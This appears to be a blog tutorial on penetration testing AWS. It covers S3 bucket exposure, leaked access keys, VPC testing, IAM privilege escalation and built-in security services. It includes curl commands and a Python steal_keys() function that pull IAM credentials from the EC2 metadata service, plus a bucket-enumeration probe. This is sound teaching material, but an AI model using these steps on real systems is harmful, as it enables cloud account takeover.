Same Same, but Different
When penetration testing Amazon Web Services (AWS) environments there are several perspectives an assessment can take; some are very similar to external infrastructure/web application assessments and some are different.
I’ll separate the things that are the same from the things that are different to traditional penetration testing by considering the following types of cloud testing and then breaking each one down into the kinds of testing that could take place:
- Testing on the Cloud: testing traditional systems which are simply hosted within a cloud environment. For example, this could be virtualised systems that have been moved from on-premises to the cloud (e.g. “lift and shift”), or web applications which are hosted on the cloud where only the applications themselves are considered in scope for the assessment and not the supporting infrastructure.
- Testing in the Cloud: testing systems within the cloud that are not exposed publicly. This could be, for example, testing the server hosting an application, or testing systems which are hosted on the cloud but have a firewall preventing direct access and are instead accessed through a bastion host (e.g. a private VPC). Additionally, we would consider the risks associated with a compromised application that allows an attacker access to the backend infrastructure.
- Testing the Cloud Console: testing the configuration of the cloud console (sometimes referred to as the portal) itself, such as looking at the user accounts which have been set up, their permissions, the access-control lists which have been configured, etc. This is effectively a configuration review and could well be compliance driven – however there are still several things in this category to consider as a penetration tester in case access to a cloud console is gained during a penetration test. It’s also most likely an efficient way to determine potential paths of privilege escalation.
I’ll finish up with a little glossary of AWS security features, which will act as an introduction to the vast world of AWS terminology and point out a few built-in features that it’s definitely worth being aware exist.
Don’t forget that you’ll need permission from Amazon as well as from the company that owns the application to perform testing activity. Penetration testing of Amazon-hosted services has obviously been conducted before, therefore Amazon have a well-documented process for informing them when testing activity is going to take place, which systems you are authorised to perform penetration testing against, and appropriate terms of service and rules of engagement. More information here: https://aws.amazon.com/security/penetration-testing/
AWS only supports penetration testing of a small number of its services, such as EC2, RDS, CloudFront, Lambda, &c. However, that doesn’t mean that security testing can’t be conducted against other systems; it just means that active penetration testing and vulnerability scanning type activity cannot be conducted against them, which would limit you to console configuration review. Terms and conditions apply; I’m not a lawyer; read the small print; batteries not included.
Testing on the Cloud
Testing systems and applications that are simply lifted-and-shifted to the cloud is likely to be no different to testing an application that was hosted on-premises. The differences start coming in when the maturity of the cloud installation increases to the point that AWS-specific functionality is incorporated, such as S3 buckets.
S3 Bucket Troubles
S3 stands for Simple Storage Service. It’s designed as a web service to store and retrieve any amount of data from anywhere on the web. In short: highly scalable, reliable, fast, inexpensive data storage. By default, access to buckets is fairly restricted, but there are a few ways that it can get a little messed up and potentially allow an attacker to access or store arbitrary data in your bucket.
S3 Buckets are within a global namespace, so they must be uniquely named. S3 buckets can be used for arbitrary data storage but many people use them for hosting websites and web content. Being able to enumerate an S3 bucket is just a fact of how they work, but being able to list their contents, view all contents, and write to them are configurable options.
So the issues around S3 are effectively:
- Listable buckets
- World-readable buckets
- World-writeable buckets.
Access to S3 buckets can be controlled in several ways: IAM policies, S3 bucket policies and S3 ACLs. S3 ACLs are legacy. There’s Amazon documentation about their protection here: https://aws.amazon.com/blogs/security/iam-policies-and-bucket-policies-and-acls-oh-my-controlling-access-to-s3-resources/.
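For illustration, a bucket policy along the following lines is one common way a bucket ends up world-readable – a Principal of “*” grants anonymous read access to every object (the bucket name here is hypothetical):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PublicRead",
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::bucket.name/*"
    }
  ]
}
```

This is sometimes intentional (static website hosting), but applied to a bucket holding anything sensitive it is exactly the world-readable issue described above.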
A world-readable S3 bucket could be accessed like this (add --no-sign-request to make the request without credentials):
aws s3 ls s3://bucket.name
If you’ve not used the awscli before you can set it up by creating a free tier account on AWS (https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/) and then setting up a user account under IAM (Identity and Access Management) which is here: https://console.aws.amazon.com/iam/home#/home
If you set up a user account under users (https://console.aws.amazon.com/iam/home#/users) then you can view or create an accessKey and secretKey here: https://console.aws.amazon.com/iam/home#/users/USERNAME?section=security_credentials
sudo easy_install awscli
aws configure
AWS Access Key ID [None]: Your-AWS-AccessKey
AWS Secret Access Key [None]: Your-AWS-SecretKey
Default region name [None]: us-west-2
Default output format [None]:
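It’s worth knowing that aws configure stores these values in plain text under ~/.aws/ – the keys land in ~/.aws/credentials in INI format, which is itself a place keys get disclosed from:

```ini
[default]
aws_access_key_id = Your-AWS-AccessKey
aws_secret_access_key = Your-AWS-SecretKey
```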
“World-readable S3 bucket” could actually refer to two issues. The first is an S3 bucket with read permissions granted to “Everyone”, which in fact means everyone on the internet, not everyone within your organisation. The second is read permission granted to “All AWS Users”, which means everyone with an AWS account, not just everyone within your users list.
Finally, you can’t restrict users to listing specific buckets. They can either list them all or they can’t. Keys that can list one bucket can list all the buckets for that account. So make sure their names don’t contain anything confidential. It’s also possible for an anonymous user to remotely enumerate that a bucket exists by guessing its name. Not the biggest vulnerability to be aware of but worth noting that it exists.
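The remote enumeration trick works because S3 answers differently depending on whether a guessed name exists. A minimal sketch of interpreting the response (the helper names are my own, and this only covers the common status codes):

```python
# Sketch: anonymously probing whether a guessed S3 bucket name exists.
# An unauthenticated GET of the bucket URL returns 404 (NoSuchBucket) for
# names that don't exist, 403 (AccessDenied) for buckets that exist but
# deny anonymous listing, and 200 with an XML listing for listable buckets.

def bucket_url(name: str) -> str:
    """Build the virtual-hosted-style URL for a bucket name."""
    return f"https://{name}.s3.amazonaws.com/"

def classify(status: int) -> str:
    """Map an HTTP status code from the probe to what it tells an attacker."""
    if status == 404:
        return "does not exist"
    if status == 403:
        return "exists (listing denied)"
    if status == 200:
        return "exists and is listable"
    return "unknown"
```

Fetching bucket_url() with any HTTP client and feeding the status code to classify() is enough to confirm a bucket’s existence without any credentials at all.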
If you want to see practical examples of this kind of issue then check out flaws.cloud!
There are examples of this happening in the wild too:
Losing Your Keys
Access to AWS services is controlled by keys (accessKey and secretKey). Permissions are highly granular, and of course the permissions you get to AWS differ based on the keys that you use, as you’d expect. One vulnerability to consider is losing your keys. If AWS keys (accessKey and secretKey) are ever disclosed then bad things can occur – an attacker would obviously gain all of the privileges that those keys offer.
So I’ll run through a few ways in which AWS keys can be compromised, some are fairly obvious and some use cool AWS specific functionality. Starting at the beginning…
Accidentally committing them
If you work with a version control system like Git there is the potential that keys will be committed to the repository, and it’s not quite as simple as just uncommitting them, or overwriting them with another commit. I won’t go over how to remove keys from a commit because my recommendation would be: if you have disclosed keys by mistake, revoke them and issue new keys. If keys were disclosed to a party which is now deemed not trustworthy, revoke them and issue new keys. If you wrote them down on a post-it note, revoke them and issue new keys.
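Spotting committed keys can be partly automated: AWS access key IDs are 20 characters starting “AKIA”, so a simple pattern match over repository history (e.g. the output of git log -p) catches the obvious cases. A sketch (finding the pattern doesn’t prove a key is live, and secret keys are harder to match reliably):

```python
# Sketch: scan text for strings shaped like AWS access key IDs.
import re

# Access key IDs are "AKIA" followed by 16 upper-case alphanumerics.
ACCESS_KEY_RE = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")

def find_access_keys(text: str) -> list:
    """Return all substrings of `text` that look like AWS access key IDs."""
    return ACCESS_KEY_RE.findall(text)
```

Running this over `git log -p` output before pushing is a cheap safety net, though dedicated tools exist for the same job.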
Might seem like a stretch to some of you? It happens:
Extracting keys from an EC2 instance
EC2 is an elastic computing service within AWS which is similar in nature to virtual private servers. Whilst an attacker is unlikely to have raw access (e.g. console access) to an EC2 instance, there is the possibility that an attacker could gain that level of access and then use it to steal the AWS keys. Most organisations would realise that if an instance (or VPS) is compromised to this level a significant impact has been caused by the attacker, and would likely perform some action like flattening the instance and rebuilding it to prevent backdoors, etc., from being used – however you should also consider that the keys may have been compromised.
This could work, for example, in the case of a web application with a remote code execution vulnerability. The attacker could access the AWS Instance Metadata Service to pull the keys. The Instance Metadata Service has documentation here: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
In short, the attacker, from the compromised instance, could access:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
which would return the role name, and:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
would return the keys. More information is available here: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html#instance-metadata-security-credentials
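The same two-request dance is trivial to script from a compromised instance. A sketch (the endpoint is the documented metadata address; the function names are my own, and this obviously only returns anything when run on an EC2 instance with a role attached):

```python
# Sketch: pulling role credentials from the EC2 Instance Metadata Service.
import urllib.request

# Documented IMDS endpoint for instance-profile credentials.
METADATA_BASE = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def credentials_url(role_name: str) -> str:
    """Build the per-role credentials URL from the base endpoint."""
    return METADATA_BASE + role_name

def steal_keys() -> str:
    """From a compromised instance: first request lists the attached role
    name, second returns a JSON document containing AccessKeyId,
    SecretAccessKey and a short-lived session Token."""
    role = urllib.request.urlopen(METADATA_BASE, timeout=2).read().decode().strip()
    return urllib.request.urlopen(credentials_url(role), timeout=2).read().decode()
```

Note the returned credentials are temporary session credentials, but for the attacker that’s more than enough to act with the instance’s role until they expire.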
Yep, that happens too:
Testing in the Cloud
By “testing in the cloud” I mean effectively having the perspective of a system running within an Amazon Virtual Private Cloud (VPC) or equivalent. Something similar to a penetration tester walking into an office, plugging a laptop into an available network port and starting to scan machines, or an attacker compromising a client device with a phishing attack and trying to pivot into the corporate network. In the context of a cloud environment, the equivalent attack would be a cloud server, or EC2 instance, being compromised by an attacker, who then attempts to attack additional machines within the VPC.
As with security testing any network environment there are a few different approaches. One of the simplest would be to perform vulnerability scanning within the VPC, which could be achieved by deploying a vulnerability scanning appliance; these can be acquired through Amazon Machine Images (AMIs), and scanners are available from Tenable (Nessus) and Qualys, for example.
Alternatively a Penetration Tester could be given secure access to an instance within the VPC, or interconnected to the VPC, to allow them network access for their testing. Another approach would be to set up a VPN tunnel to the AWS environment to allow penetration testing activity within the environment more directly. The number of instances, complexity of the environment, and desired level of assurance will likely dictate which is the best approach.
Testing the Cloud Console
Finally, by testing the cloud console itself, I am referring to connecting to the AWS Console to take a look at the security of its configuration. Really this is configuration review type activity, but it’s worth taking a brief look at here, as an attacker could potentially compromise an account with access, and it gives an introduction to a few of the vulnerabilities that exist and the security features Amazon has provided.
The first thing to say, in regards to an attacker compromising an account with access to the AWS Console, is that accounts can be configured to require multifactor authentication (MFA; sometimes referred to as two-factor authentication or 2FA). There are quite a number of MFA options for AWS, and it can be used to control access both to the console and to AWS APIs. More details are available here: https://aws.amazon.com/iam/details/mfa/
AWS allows granular configuration of Identity and Access Management (IAM). You can restrict the permissions a user has to quite a fine degree, however there are certain permissions which potentially allow a greater level of access than you might realise.
There are a couple of detailed write ups and tools available, so I’d recommend reviewing those too if this is a concern to you:
Rhino Security Labs’ Write up: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
In short, there are many permission sets which, under certain configurations, can allow for privilege escalation within AWS environments; CyberArk gives 10 examples of these and Rhino Security Labs added a few more.
A simple example you may come across would be where a user may modify the policy version which applies to their account by means of having the iam:SetDefaultPolicyVersion permission.
If you consider the situation where an administrator sets up an account and then hardens it once everything is working, it would not be a stretch to expect the administrator to grant more permissions than are necessary initially and then tune the account’s permissions down to follow the principle of least privilege. If a policy version the attacker has access to has a higher level of permissions, and they have permission to set the default policy version, they can simply change which version is in use. This kind of issue is obviously highly contextual to the specific set-up of your environment, and Rhino Security Labs gives 17 such possible privilege escalation methods – so it’s certainly worth reviewing them!
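Auditing for this particular escalation path comes down to comparing a policy’s versions: if a non-default version grants more than the default, anyone holding iam:SetDefaultPolicyVersion on that policy can switch to it. A sketch of flagging the obvious case (the data shape loosely mirrors what IAM returns for policy versions, and the helper names are my own):

```python
# Sketch: flag non-default policy versions that grant full admin ("Action": "*"),
# i.e. versions an attacker with iam:SetDefaultPolicyVersion could switch to.

def grants_admin(document: dict) -> bool:
    """True if any Allow statement in the policy document grants Action '*'."""
    for stmt in document.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        if actions == "*" or "*" in actions:
            return True
    return False

def escalation_candidates(versions: list) -> list:
    """Return VersionIds of non-default versions granting full admin."""
    return [v["VersionId"] for v in versions
            if not v["IsDefaultVersion"] and grants_admin(v["Document"])]
```

In a real audit you’d pull the versions with the IAM API (ListPolicyVersions/GetPolicyVersion) and compare each version’s grants against the default rather than only checking for a blanket “*”.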
Finally, there are tools to help audit the configuration of your AWS Console, such as Scout2: https://github.com/nccgroup/Scout2
AWS Security Features
AWS has many security features, and I find it interesting when I talk to people who use AWS who aren’t aware of the various monitoring and security features that are built in. There are alternatives to them all of course, and they’re not all free – but it’s worth at least checking the basics out to see what your options are! So here are some examples:
AWS Inspector – https://aws.amazon.com/inspector/ – is an automated security assessment service for applications deployed within AWS. If you’d like to try it out there is a 90-day trial of up to 250 agent-assessments. It finds issues such as insecure protocols, software running without DEP, software without stack cookies, and root processes – but it requires an agent to be installed to use.
AWS CloudWatch – https://aws.amazon.com/cloudwatch/ – is a system monitoring service. It has basic or detailed monitoring, of which the latter has a fee. It keeps an eye on systems and watches metrics such as read/write latency of EBS, storage availability within RDS, CPU utilisation of EC2 instances.
AWS CloudTrail – https://aws.amazon.com/cloudtrail/ – is a system that allows you to log what’s happening within your AWS environment, including actions taken within the console, command line tools, and services. It’s useful not only for security purposes but also things such as monitoring changes to your resource utilisation over time, for example.
AWS Athena – https://aws.amazon.com/athena/ – is a service which allows you to query data stored within S3 buckets using SQL. So it’s great to pair up with CloudTrail to effectively search your log dumps in a more effective, or complex, way than what CloudTrail offers itself.
AWS TrustedAdvisor – https://aws.amazon.com/premiumsupport/trustedadvisor/ – is a system which gives recommendations in several categories, but of course it’s tiered so there’s “core” and “full” depending on if you’re on a standard, business, or enterprise plan (the latter two get “full” access). It gives recommendations on how to improve your environment in categories such as: security, cost optimisation, performance, and fault tolerance. Nicely they actually expose all of the checks each level and category provide (https://aws.amazon.com/premiumsupport/trustedadvisor/best-practices/), so for example under security we have things such as: security groups with unrestricted access, unrestricted access to systems to specific network ports, missing MFA on the root account, IAM password policy, etc.
AWS Artifact – https://aws.amazon.com/artifact/ – gives access to compliance reports for requirements such as ISO 9001, ISO27001, PCI DSS, and more.
AWS Shield – https://aws.amazon.com/shield/ – is managed DDoS protection, which provides always-on protection against DDoS attacks by monitoring for them and then automatically placing in-line mitigations on systems. There is also AWS Shield Advanced for higher levels of protection. One thing definitely worth a look is the “Cost Protection”, which returns service credits for scaling charges caused by DDoS attacks.